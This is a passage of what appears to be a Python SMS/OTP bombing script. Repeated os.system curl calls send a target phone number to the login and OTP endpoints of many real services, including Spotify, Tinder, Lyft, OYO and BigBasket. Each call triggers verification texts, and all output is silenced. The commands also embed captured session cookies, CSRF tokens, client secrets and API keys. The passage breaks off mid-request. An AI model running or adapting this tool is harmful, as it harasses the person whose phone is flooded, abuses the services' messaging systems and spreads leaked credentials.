curl 'https://tikona-expresswifi-com.tikona.in.expresswifi.com/customer/login/?ref=landing_view_next_clicked&country_code=IN&refid=8' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://tikona-expresswifi-com.tikona.in.expresswifi.com/' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Connection: keep-alive' -H 'Cookie: datr=lbe2X3ZshI_n0mT0Q0jLnBoC; wd=1366x541' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'lsd=AVpLs-VOVTM&jazoest=2911&raw_customer_mobile_number='''+target+'''&processed_customer_mobile_number='''+target+'''&pin_notif_medium=&is_tokenized_mobile_number_invalid=false&js_check=js_check_passed' > /dev/null 2>&1
''')
os.system('''
curl 'https://www.oyorooms.com/api/pwa/generateotp?locale=en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://www.oyorooms.com/login?country=&retUrl=/' -H 'XSRF-TOKEN: dKkEqcG0-lsyZi2T6_8SIrxwoUTnOy1qanY4' -H 'Content-Type: text/plain;charset=UTF-8' -H 'Origin: https://www.oyorooms.com' -H 'Connection: keep-alive' -H 'Cookie: _csrf=wpaVZvtR40diSsIuZbF5gVqA; acc=IN; X-Location=georegion%3D104%2Ccountry_code%3DIN%2Cregion_code%3DGJ%2Ccity%3DAHMEDABAD%2Clat%3D23.03%2Clong%3D72.62%2Ctimezone%3DGMT%2B5.50%2Ccontinent%3DAS%2Cthroughput%3Dvhigh%2Cbw%3D5000%2Casnum%3D45916%2Clocation_id%3D0; mab=4960a9378eff91b90107f54bc9084e1b; expd=mww2%3A1%7CBnTc%3A0%7Cnear%3A0%7Cioab%3A1%7Cmhdp%3A1%7Cbcrp%3A1%7Cpwbs%3A1%7Cmwsb%3A0%7Cslin%3A1%7Chsdm%3A0%7Clpex%3A1%7Clphv%3A0%7Cdpcv%3A0%7Cgmab%3A0%7Curhe%3A0%7Cprdp%3A1%7Ccomp%3A0%7Csldw%3A1%7Cmdab%3A0%7Cnrmp%3A1%7Cnhyw%3A1%7Cwboi%3A1%7Csst%3A1%7Ctxwb%3A1%7Cpod2%3A1%7Clnhd%3A1%7Cppsi%3A0%7Cgcer%3A0%7Crecs%3A1%7Cgmbr%3A0%7Cyolo%3A1%7Crcta%3A0; appData=%7B%22userData%22%3A%7B%22isLoggedIn%22%3Afalse%7D%7D; token=dUxaRnA5NWJyWFlQYkpQNnEtemo6bzdvX01KLUNFbnRyS3hfdEgyLUE%3D; _uid=Not%20logged%20in; XSRF-TOKEN=dKkEqcG0-lsyZi2T6_8SIrxwoUTnOy1qanY4; ak_bmsc=F1B2E3F36EAD2FF4FD5308B628F6FF73312C8CACA15C0000FC5FB75F297D6274~pleE7MFZIyrbPoGtCLbQihpkmLZeoWIVJDqX3JotgCKRsrPKNNS0NcVh93CT0m5EAEzreK025SmSVEtb5amEFAVCQCnrT4FLlZiOFYDnlciOxBxfEi/NSdQm0z4+eodnznc0Nq9mAj8XtjTb6h9EOlouxSmtg1/pC1sDaMJjJIqJw2UTfiz2EH251w/iGv79xs+1HaAVIPqKyI0sbz8fNq9/+a9QFiaQCu4mDc5rJbDGSiev8klA9PZp1Kqgqp9Clg; bm_sv=08C795B730BF8AF6BC867D9C3D8C9B9F~1gO1Fw847iTM/sJ8D17FF4+By/VzI2r3QySU63DyaFqGCqqF2UG3JUVDwwKgzJIY3yWZmW8gMexvqvhOlb6RTetcoNf9bFsifm2qreXy1abdEknXsU8Doev+4uBoBd9Rk5BDYYxPDQi0HnrY8571zgtXEQlMJ4Opknf61pKlaIE=; AMP_TOKEN=%24NOT_FOUND; fingerprint2=da540609af0a0473dca22afd95783b45; _ga=GA1.2.846289981.1605853243; _gid=GA1.2.1821614385.1605853243; _gcl_au=1.1.833385247.1605853244; tvc_utm_source=google; tvc_utm_medium=organic; tvc_utm_campaign=(not set); tvc_utm_key=(not set); tvc_utm_content=(not set); _uetsid=85e7f7e02af811eba53de3e48aa3fff5; _uetvid=85e96ba02af811eb899477482b721ac6; moe_uuid=58cae2cf-8df9-43dc-8088-6f91e9758626; cto_bundle=kBKOtl9RdE1hZlB0b0NTN1FzaGIyJTJCMkhzekFPUGVnTm0lMkZyU0N6WDlaSFJOOVk3V0xjJTJCaGdDJTJGNUhMSVBzOUQ0dXg0a2FjdURxaVFOdVpycUVyZ0ZQYklxbG5lbTRZNTFlTVdrME9mRnIzd29VM1pONTY0ek5HJTJGd2l6RVpHcG81VnI0c2NzaHkwcWtpRnJmJTJCbGRxd3VBJTJGb0daNkgxSTJpS210NWZDWDclMkJLNE01ekFqNVA4dzZHRnhRQ1RaQVdGaVNUV0ky; _fbp=fb.1.1605853249274.1421681914; outbrain_cid_fetch=true; _gat=1' --data-raw '{"phone":"'''+target+'''","country_code":"+91","nod":4}' > /dev/null 2>&1
''')
os.system('''
curl 'https://drive.olacabs.com/oauth/api/v2/web/auth/preauth' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: application/json, text/plain, */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://drive.olacabs.com/otp' -H 'Content-Type: application/json' -H 'x-request-key: 0c19d4b1-1618-29a1-ba9e-92f58b2652ad' -H 'x-fp-key: 8166d0dd-04b9-07a6-3636-73d53ca70515' -H 'x-application-license-key: d6ba8ca2d23c4f2aabace889d1d9a973' -H 'Connection: keep-alive' -H 'Cookie: _gcl_au=1.1.1320744897.1605855276; G_ENABLED_IDPS=google; _ga=GA1.2.589847508.1605855277; _gid=GA1.2.637545922.1605855277; _fbp=fb.1.1605855277256.1820893570; X-Access-token=eyJhbGciOiJIUzI1NiJ9.eyJ0dCI6IlBUIiwiaWJ5IjoiaHR0cHM6Ly9zdXBwbHktYXBpLm9sYWNhYnMuY29tIiwiYWJhIjpmYWxzZSwidHYiOiJ3dHYyIiwiaXBsIjpmYWxzZSwiY2xpZW50VG9rZW4iOmZhbHNlLCJkZXZpY2VGaW5nZXJQcmludCI6ImJtSUsxZTlNOEdOMERSQkZIS0xJMW1lN0JFVFlhOU55N2dRMmc4SjNjdHNsVFFkVi9OZDE4eWZldlh1WEdwTmZRZHYwbk5nWVlsc05nSVo5bURMOUh3PT0iLCJibGFja0xpc3RlZCI6ZmFsc2UsInRva2Vua2V5IjoiNWE2NjJhZmMtZTZmOS00YmZjLTkyNDMtN2YxMzk3NWYwN2M1IiwiZGVsZXRlZCI6ZmFsc2UsImFwcGxpY2F0aW9uTGljZW5zZUtleSI6ImQ2YmE4Y2EyZDIzYzRmMmFhYmFjZTg4OWQxZDlhOTczIiwicHJvdmlkZXIiOiJJTVNTdXZpZGhhQXV0aCIsImxpY2Vuc2VWZXJzaW9uIjoxMDAxLCJhdXRoX3NjaGVtZSI6Ik9UUCIsImV4cGlyeSI6MTYwNTg1NTg4ODEwNywiaWF0IjoxNjA1ODU1Mjg4MTA3fQ.NKB_7-L_-T3BBcyAi3s_aot-85Dhi140KKSg9EQewN0; _gat_UA-151183718-1=1; _gat_UA-20199135-16=1' -H 'TE: Trailers' --data-raw '{"auth_scheme":"OTP","provider":"IMSSuvidhaAuth","credential":{"idToken":"","dialingCode":"+91","mobileNumber":"'''+target+'''"}}' > /dev/null 2>&1
''')
os.system('''
curl 'https://accounts.spotify.com/login/phone/code/request' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: application/json, text/plain, */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://accounts.spotify.com/en/login/phone?continue=https:%2F%2Faccounts.spotify.com%2Fen%2Fstatus' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Connection: keep-alive' -H 'Cookie: __Host-device_id=AQBagpNYapOFsSYmwBOFWYFlp5wmn9_goFdJdshoSBmPW9JF-6GyFT9s2ol4awPJ9oxgIKupgji5F9JF1RIxmVk73Jg7bn0nQBY; __Secure-TPASESSION=AQDoNfGggr46/8s+Iy+hth6s6faFYscDJSuFrVVnQciVoszMxjyPJZMfFoosmAZ24281f0firVil0qbSQqP8/9nTmiTY5CVEUMo=; csrf_token=AQB4RBQMuhhLP5FRikp6sZKAfacvsSVf0NeUxiqNWTHTCLYFs4jD2eRsonexMVLQE6kqELxRaUZ0VwOlvA; __bon=MHwwfDYyNzE2MjM5MHwyNjM0MDgyMDM4MHwxfDF8MXwx; remember=1; _ga=GA1.2.1997859450.1605856440; _gid=GA1.2.858075890.1605856440; _gat=1' -H 'TE: Trailers' --data-raw 'phonenumber=%2B91'''+target+'''&csrf_token=AQB4RBQMuhhLP5FRikp6sZKAfacvsSVf0NeUxiqNWTHTCLYFs4jD2eRsonexMVLQE6kqELxRaUZ0VwOlvA' > /dev/null 2>&1
''')
os.system('''
curl 'https://accounts.croma.com/api/v1/sso/login/phone-otp' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: application/json, text/plain, */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://accounts.croma.com/phone-otp?clientId=CROMA-WEB-APP&redirectURL=https%3A%2F%2Fwww.croma.com%2Fvalidate-sso-token%2F%3FredirectUrl%3Dhttps%3A%2F%2Fwww.croma.com' -H 'Content-Type: application/json;charset=utf-8' -H 'client_id: CROMA-WEB-APP' -H 'client_secret: 93aa47c8-05d5-47fd-b484-5de663b3a3dd' -H 'Access-Control-Allow-Origin: https://api.tatadigital.com' -H 'Ocp-Apim-Subscription-Key: 354d9be9edce479fbd797edc71ebf50b' -H 'Ocp-Apim-Trace: true' -H 'Connection: keep-alive' -H 'Cookie: _dy_ses_load_seq=34597%3A1605857296267; _dy_csc_ses=t; _dy_c_exps=; _dy_soct=508122.944897.1605857296; AMCV_E78F53F05EFEF21E0A495E58%40AdobeOrg=359503849%7CMCIDTS%7C18587%7CvVersion%7C5.0.1; AKA_A2=A; SESSION=MmY5YjY3NzUtMDFhNy00NmRhLTgxMjgtNzc1NDFlZDhlODI0; RT="z=1&dm=croma.com&si=yyxgdo1sx9&ss=khpxz140&sl=0&tt=0"; AMCV_EE3B6AAD5E1ED5570A495FA0%40AdobeOrg=-408604571%7CMCIDTS%7C18587%7CMCMID%7C55093355428516333280615618269338090932%7CMCAAMLH-1606462101%7C12%7CMCAAMB-1606462101%7CRKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y%7CMCOPTOUT-1605864501s%7CNONE%7CMCAID%7CNONE%7CvVersion%7C4.6.0; mbox=session#a6f07114ea0b4e059e0407da5737386e#1605859161|PC#a6f07114ea0b4e059e0407da5737386e.31_0#1669102135; AMCVS_EE3B6AAD5E1ED5570A495FA0%40AdobeOrg=1; at_check=true; s_plt=8.82; s_pltp=%5B%5BB%5D%5D; s_vnc365=1637393303239%26vn%3D1; s_ivc=true; s_dur=1605857303244; s_tslv=1605857332374; s_ppv=https%253A%2F%2Faccounts.croma.com%2Fphone-otp%253FclientId%253DCROMA-WEB-APP%2526redirectURL%253Dhttps%25253A%25252F%25252Fwww.croma.com%25252Fvalidate-sso-token%25252F%25253FredirectUrl%25253Dhttps%25253A%25252F%25252Fwww.croma.com%2C100%2C100%2C541%2C1%2C1; s_ips=541; s_tp=541; s_cc=true; s_sq=tatadigitalproduction%3D%2526c.%2526a.%2526activitymap.%2526page%253Dhttps%25253A%25252F%25252Faccounts.croma.com%25252Fphone-otp%25253FclientId%25253DCROMA-WEB-APP%252526redirectURL%25253Dhttps%2525253A%2525252F%2525252Fwww.croma.com%2525252Fvalidate-sso-token%2525252F%2525253FredirectUrl%2525253Dhttps%2525253A%2525252F%2525252Fwww.croma.com%2526link%253DConfirm%2526region%253Dapp%2526.activitymap%2526.a%2526.c%2526pid%253Dhttps%25253A%25252F%25252Faccounts.croma.com%25252Fphone-otp%25253FclientId%25253DCROMA-WEB-APP%252526redirectURL%25253Dhttps%2525253A%2525252F%2525252Fwww.croma.com%2525252Fvalidate-sso-token%2525252F%2525253FredirectUrl%2525253Dhttps%2525253A%2525252F%2525252Fwww.croma.com%2526oid%253DSubmit%2526oidt%253D3%2526ot%253DSUBMIT' -H 'TE: Trailers' --data-raw '{"countryCode":"91","phone":"'''+target+'''"}' > /dev/null 2>&1
''')
os.system('''
curl 'https://www.bigbasket.com/mapi/v4.0.0/member-svc/otp/send/' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: application/json' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://www.bigbasket.com/auth/login/' -H 'Content-Type: application/json' -H 'X-CSRFToken: 96kahOxAdlUzDGHh8EpbmaTR7syxZMnZQfnIm5st3ojXLBSxAImGurxqspds5cML' -H 'X-Channel: BB-WEB' -H 'X-Caller: DVAR-SVC' -H 'Origin: https://www.bigbasket.com' -H 'Connection: keep-alive' -H 'Cookie: _bb_cid=1; _bb_aid="MzAwNDkxOTI2MA=="; _bb_locSrc=default; ts="2020-11-20 13:12:50.255"; _bb_ftvid="MzY4MzM3MTE2MQ==|dgoLTkMCAE4rCkZVUFJRABBTXF8ESVhQUhB3LjE="; _bb_hid=1723; _bb_vid="MzY4MzM3MTE2MQ=="; _bb_tc=0; _client_version=2346; _bb_rdt="MzE1MjY0NTY0OQ==.0"; _bb_rd=6; _sp_van_encom_hid=1722; _sp_bike_hid=1720; sessionid=d6f764m71ykhzgx6cegwezceq52v7e5o; csrftoken=96kahOxAdlUzDGHh8EpbmaTR7syxZMnZQfnIm5st3ojXLBSxAImGurxqspds5cML; bigbasket.com=8250e4f4-2770-4dd2-877a-d85898863f09; _ga=GA1.2.2046045764.1605858142; _gid=GA1.2.1185598527.1605858142; adb=0; _gcl_au=1.1.605561576.1605858156; _fbp=fb.1.1605858156460.1577717186; G_ENABLED_IDPS=google' --data-raw '{"identifier":"'''+target+'''"}' > /dev/null 2>&1
''')
os.system('''
curl 'https://secure.yatra.com/social/common/yatra/sendMobileOTP' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: application/json, text/javascript, */*; q=0.01' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://secure.yatra.com/social/common/yatra/signin.htm?returnUrl=https%3A%2F%2Fcoupons.yatra.com%2Fcoupons%2Fcoupons' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Connection: keep-alive' -H 'Cookie: JSESSIONID=CAD6EDDFD722B0F5B18E0C5A483C444D; ak_bmsc=9689D8FBBBE6F8B8E0AFC3D282540E1A687C3626122B00002875B75FB9590E32~plQDz7HnlsEyxa0im/g5FNLbC99hsc0o703nsekr8QOIWIGRfkOdzPaA32fdQ175uNYMGytOdfSsqO7h7hOpy/uMgnAHAidE8F7tPw4UpSC/yxZl0GvjuTgZVFnhVSWXol+6xeUdUgglJVCoey6PCcnIWVw4BzmniOyERYqUvyIzmyV1SEfS56aAEJ47MB5EfPXvZBQcBNWbOaIj1uw7rNuMIsEK4wnq8xcxpyVkOHXloAFbAGHZUCqLI8dev4qJAp; bm_sz=CC87061EE645067189F92F114F966008~YAAQJjZ8aMvQ7sd1AQAAsqeh5Akq7teFdAOnJHVk8/4Mc4JCAfgWbJpR8AZzk0rQ8rDMeDU88H9Uoh9CRbjRsHngOf98QOBD3b9XDxdnvnl7cOzV/0RCCQnF+T0M4yTxhZeJ1Ca/iM3ifN9VU7R1KmXWwY43Res3bV6PlDGFp/cnM3UZ4d+IlrK7yuw2Py8=; _abck=9ABE9B02B4CA41C61350A940FD077867~0~YAAQJjZ8aG7R7sd1AQAAaNmh5ARwT7ffQjyaiGv1tfvp/HHqrunQnyXa6ouUoDwrnyeQPHc103qCI+PP7BuOw9putCxkHTsVp+38AD2P5gV2lDa16rDoFZOzDuG6rdrbB9vKbUCdGHovXzR2mdiHJER05CSAv77KzTGoaOgE/YsIcgPu2Bq92p/Home/hieD4GzTJD8KJyPKfL6bAEk5LDXADLlSmwBEWyMpHz3vT5IcknFHNy4EylV9IrXHYuVLU5cFq32e4rVsdl5QM4z6g1bdK+JD+NDFDBkIUczrEF3sXTLWS1/TRRDQv5JmhScTALuNozzpNjnswSyK8M97s3pzcay1~-1~||-1||~-1; ak_time=1605858603; G_ENABLED_IDPS=google; __utma=39525803.1472901679.1605858658.1605858658.1605858658.1; __utmb=39525803.1.10.1605858658; __utmc=39525803; __utmz=39525803.1605858658.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); __utmt=1; RT="z=1&dm=yatra.com&si=a09337a6-dcc6-4749-9cd0-dc8e7860cb25&ss=khpys0rc&sl=1&tt=dy0&bcn=%2F%2F684d0d3b.akstat.io%2F&ld=esw"; __utmli=login-continue-btn; bm_sv=D0D21B7B62167946C060923A67B453EA~BY/d8k1FFmk6N2ZMCcTgFTz92w3KEIGBPCzgkRNtltVgbXSr3xPWb4ZRp4ZohRVTOoG49usPR0AVpQx3rcPGMu4aFoj328ymf89s55U/TIfG4EcfwdICzTmMD8xr0vtlBnUaxmQtgl0KRmmL302Q6pfyXl6phoWkEfBoNIISBgw=' -H 'TE: Trailers' --data-raw 'isdCode=91&mobileNumber='''+target+'''' > /dev/null 2>&1
''')
os.system('''
curl 'https://flightservice.easemytrip.com/EmtAppService/UserRagister/UserRagistrationEmailMob' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: text/plain, */*; q=0.01' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://www.easemytrip.com/' -H 'Content-Type: application/json; charset=utf-8' -H 'Origin: https://www.easemytrip.com' -H 'Connection: keep-alive' -H 'TE: Trailers' --data-raw $'{\'_email\':\''''+target+'''\',\'refereeCode\':\'\',\'refereeURL\':\'\'}' > /dev/null 2>&1
''')
os.system('''
curl 'https://www.justdial.com/functions/whatsappverification.php' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://www.justdial.com/Login' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-FRSC-Token: e88493df92f753f01ce9d3ca1c04424bb5a5898dbaa4d4060b9ef03260127f45' -H 'X-Requested-With: XMLHttpRequest' -H 'Connection: keep-alive' -H 'Cookie: PHPSESSID=c63b6bd7433107b95879e30b4f57e723; TKY=e88493df92f753f01ce9d3ca1c04424bb5a5898dbaa4d4060b9ef03260127f45; _ctok=7d731c98975675d40b96e37f7c0f1cc0ab4e9ef92858ccd20b8fbba9d351ca07; main_city=Ahmedabad; attn_user=logout; ppc=/Login; ak_bmsc=1CA1E70C1D80BCF7436B14A514B1074C312C8CB5D6380000E285B75F5B9FF64F~plPgtyMsnWf2K3t/AX1dlqKR6ThIFCzZ8W+j3W0Yf8bDijjF3/clBfn4K83adDtqh8vJaF6EVVpv1EGj8nh2UrBnK4DRHJpYQDlH4g+PNR8VfegWAJJ3CzqHZsLyqHToXNYkkq6E1EQcaNFCEUsBba10auYz33lm+HuCKotUdkCfQBNjLOFj0BZinpTmtVXczSqKN3X2Gop1jBmwGKzuuRdUQLJlXIak/C5lPHE3e/1vOWNMA5z5mZMN8MCS10Kgs9; bm_sz=CC39C016A66631B8D86537A2E873FF0B~YAAQtYwsMfteW3d1AQAAlf7i5AlvS+cCoHYD11pkYw9iX6+v6RrN/pyca0Dk1p66vAk/QVRIv2NTCE75kEKPQlbCNrNCW39ihJ0bGmA9F4iuTZlzKpvVeLMo5W9+sr+ApyxqcPvc5AOgAg03EMd7inQes5zBEjPPSXC8C4rKcsxbM2juxBoskr1W+JKG8OsgMlg=; _abck=3861570E7476E36C640BD7E62074C48D~0~YAAQtYwsMQlfW3d1AQAATBDj5ARW7MfRfB7NDgYQGdGRlQDbYiPtczvhRlJcrGUqQPyNCjP6HOCDWBskynCPgYiMTR3RWqIgjznOKZK9Ahy+9zanNfOhSsKLUj0Sz1NF1NCljlQtinhqQHSAdjeiKSsVvtBPAKQX2zAa2m6uuUAn4Fikd4IQyUoZeKI02cjw7U1zzivI8mqCR4P5pic4DaSXe+702cum1N3GfZ/QsKJc/qp9fxXdaKChholQVIDHTHw2zQr2294wg0Fbdxw9jtUWWehQM9QcGFw35wCMoTqUMOuN6RV66MZD/FkNUckkbTSzJtBNPUkQLdOB/7x3hL/Z0GjQdpin~-1~||-1||~-1; _ga=GA1.2.1267073874.1605862936; _gid=GA1.2.738153487.1605862936; _gat=1; _gat_UA-31027791-3=1; _fbp=fb.1.1605862936074.1822559334; bm_sv=D9F5F940C3F47286707A6FB54F21B655~1lNr5Ve2q6QWLGNvR9l9++cXfUuGv7X//w9/q1NlhYDTU+bs2J5TVLuhzzCKX4RkQbt0Z3odGZJHeWL2yws3/iIoogXu5DfeDVrgXvbGqfR4LSCisdWkqC/KSPaQ/ChC/9HOQKhsfXIKN/stXzrteW8gTuBXZpb+LbNWOakoo1s=; scity=Ahmedabad; usrcity=Ahmedabad; inweb_city=Ahmedabad; dealBackCity=Ahmedabad' -H 'TE: Trailers' --data-raw 'mob='''+target+'''&vcode=&rsend=0&name=kkk' > /dev/null 2>&1
''')
os.system('''
curl 'https://api.gotinder.com/v3/auth/login?locale=en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: application/json' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://tinder.com/' -H 'app-session-id: b7a2ea4d-0375-4367-9659-59f6e06bf1cf' -H 'app-session-time-elapsed: 186483' -H 'app-version: 1026300' -H 'persistent-device-id: 614d68bc-02dc-4efd-b101-d045996667be' -H 'tinder-version: 2.63.0' -H 'user-session-id: null' -H 'user-session-time-elapsed: null' -H 'x-supported-image-formats: jpeg' -H 'platform: web' -H 'Content-Type: application/x-google-protobuf' -H 'funnel-session-id: 5ba1786023bc3fbf' -H 'Origin: https://tinder.com' -H 'Connection: keep-alive' -H 'TE: Trailers' --data-raw $'\n\x0e\n\x0c91'''+target+'''' > /dev/null 2>&1
''')
os.system('''
curl 'https://lapinozpizza.in/client/login/'''+target+'''/5' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: application/json, text/javascript, */*; q=0.01' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://lapinozpizza.in/order/lapinoz-bodakdev-ahmedabad' -H 'X-Requested-With: XMLHttpRequest' -H 'Connection: keep-alive' -H 'Cookie: PHPSESSID=3v2gk9j90j5i9hk062l31pdevo; ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%225c0ba0d10ebdd067f127a3c9e17df96a%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22103.249.233.70%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A68.0%29+Gecko%2F20100101+Firefox%2F68.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1605866048%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7D97e2b9b476bcba7be1cf42a9d16947d1; _ga=GA1.2.906933160.1605866104; _gid=GA1.2.1131025764.1605866104; _gat_gtag_UA_122849002_3=1; _fbp=fb.1.1605866104971.637099755' -H 'TE: Trailers' > /dev/null 2>&1
''')
os.system('''
curl 'https://www.okcupid.com/graphql' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://www.okcupid.com/login' -H 'content-type: application/json' -H 'x-okcupid-platform: DESKTOP' -H 'x-okcupid-version: 1' -H 'Origin: https://www.okcupid.com' -H 'Connection: keep-alive' -H 'Cookie: __cfduid=dfa43d8401b0fed2c47b51c632c5e0b471605866437; siftsession=15493059844142823704; secure_login=1; secure_check=1; guest=2002666923403036682; ua=531227642bc86f3b5fd7103a0c0b4fd6; __ssid=59b86baca6547b01cc9992b10802c65; ab.storage.sessionId.719f8d59-40d7-4abf-b9c3-fa4bf5b7cf54=%7B%22g%22%3A%2272dbce82-10c4-713a-5bb1-e402e787b171%22%2C%22e%22%3A1605868311668%2C%22c%22%3A1605866505179%2C%22l%22%3A1605866511668%7D; ab.storage.deviceId.719f8d59-40d7-4abf-b9c3-fa4bf5b7cf54=%7B%22g%22%3A%228b634f6e-4c32-79a4-e819-044ca72fbd68%22%2C%22c%22%3A1605866505189%2C%22l%22%3A1605866505189%7D; OptanonConsent=isIABGlobal=false&datestamp=Fri+Nov+20+2020+15%3A31%3A49+GMT%2B0530+(GMT%2B05%3A30)&version=6.6.0&hosts=&consentId=3fde33bc-3d3e-4a1c-9ff5-1890597623aa&interactionCount=1&landingPath=NotLandingPage&groups=1%3A1%2C2%3A1%2C3%3A1%2C4%3A1; OptanonAlertBoxClosed=2020-11-20T10:01:49.190Z; _ga=GA1.2.858792157.1605866511; _gid=GA1.2.755737974.1605866511; _gat=1; kppid_managed=NxkODtGQ' -H 'TE: Trailers' --data-raw '{"operationName":"authOTPSend","variables":{"input":{"tspAccessToken":"eyJhbGciOiJIUzI1NiJ9.eyJpZCI6Ijc2Njg0NTc3MyIsImV4cCI6MTYwNTg2ODI4NiwidW5pcXVlbmVzc19pZCI6IlNCTHlXdVFqNTFKNSJ9.u5f7oqaCJWJeSWKVGOKEMSrRQEWzXOptZUaUr4JxyTY","phoneNumber":"91'''+target+'''","platform":"web"}},"query":"mutation authOTPSend($input: AuthOTPSendInput!) {\n authOTPSend(input: $input) {\n success\n statusCode\n __typename\n }\n}\n"}' > /dev/null 2>&1
''')
os.system('''
curl 'https://bumble.com/mwebapi.phtml?SERVER_SUBMIT_PHONE_NUMBER' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://bumble.com/get-started' -H 'Content-Type: json' -H 'x-use-session-cookie: 1' -H 'Connection: keep-alive' -H 'Cookie: session=s1:9999:tceRU9LytKufwZ4zIbcqR2zP5mL1M4TPYE87nxe3; session_cookie_name=session; device_id=9711d8c6-d8c6-c60a-0ae8-e84e96a51b10; buzz_lang_code=en-us; _ga=GA1.2.959078456.1605866855; _gid=GA1.2.1635307871.1605866855; _pin_unauth=dWlkPU4yRTBPRE13WkRJdE16RXdaaTAwTjJZM0xUZ3dOemt0TkRZeU5qZ3dZV0kzWW1GbA; _fbp=fb.1.1605866855634.1658618970; _gat=1; _scid=377c24e1-4f83-4c62-8cb0-dea1bfe18331; _sctr=1|1605810600000; HDR-X-User-id=' --data-raw '{"$gpb":"badoo.bma.BadooMessage","body":[{"message_type":678,"server_submit_phone_number":{"phone_prefix":"+91","screen_context":{"screen":23},"phone":"'''+target+'''","context":203}}],"message_id":10,"message_type":678,"version":1,"is_background":false}' > /dev/null 2>&1
''')
os.system('''
curl 'https://api.lyft.com/v1/phoneauth' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: application/json, text/plain, */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://account.lyft.com/' -H 'Content-Type: application/json;charset=utf-8' -H 'Lyft-Version: 2017-09-18' -H 'x-locale-language: en-US' -H 'Origin: https://account.lyft.com' -H 'Connection: keep-alive' -H 'Cookie: accountAuthXSRFToken=14cbe403-6944-4e7f-8f3b-de7db0f9db9b; sessId=37c998a4-6483-4b48-b56c-cf929a78b8c0L1605867592; _gcl_au=1.1.485351020.1605867647; _ga_LQ1KHS36LD=GS1.1.1605867647.1.1.1605867647.60; _ga=GA1.2.396555731.1605867648; _gid=GA1.2.853807903.1605867648; OptanonConsent=isIABGlobal=false&datestamp=Fri+Nov+20+2020+15%3A50%3A54+GMT%2B0530+(GMT%2B05%3A30)&version=5.13.0&landingPath=NotLandingPage&groups=1%3A1%2C2%3A0%2C3%3A0%2C4%3A0%2C0_231652%3A0%2C0_231650%3A0%2C0_231656%3A0%2C0_231654%3A0%2C0_231660%3A0%2C0_239512%3A0%2C0_231658%3A0%2C0_231664%3A0%2C0_231662%3A0%2C0_231667%3A0%2C0_231644%3A0%2C0_231648%3A0%2C0_231646%3A0%2C0_231653%3A0%2C0_231651%3A0%2C0_231657%3A0%2C0_231655%3A0%2C0_231661%3A0%2C0_231659%3A0%2C0_231665%3A0%2C0_231663%3A0%2C0_231668%3A0%2C0_231666%3A0%2C0_231645%3A0%2C0_231643%3A0%2C0_231649%3A0%2C0_231647%3A0&AwaitingReconsent=false; _gat_UA-1446928-6=1; _dc_gtm_UA-1446928-6=1; _gat_UA-1446928-17=1; _gat_UA-1446928-10=1; lyftAccessToken=bftjCkfCa3Rshf9QlloZhitB3BASjbEn6gZFYSLxN0efiLlq+bogZ7gJDXgzQNZATvjqABEOVscMLrDscSGflbOWzEvwsoOD1uq8dp2PqL8c+zwhpihNRb8=; 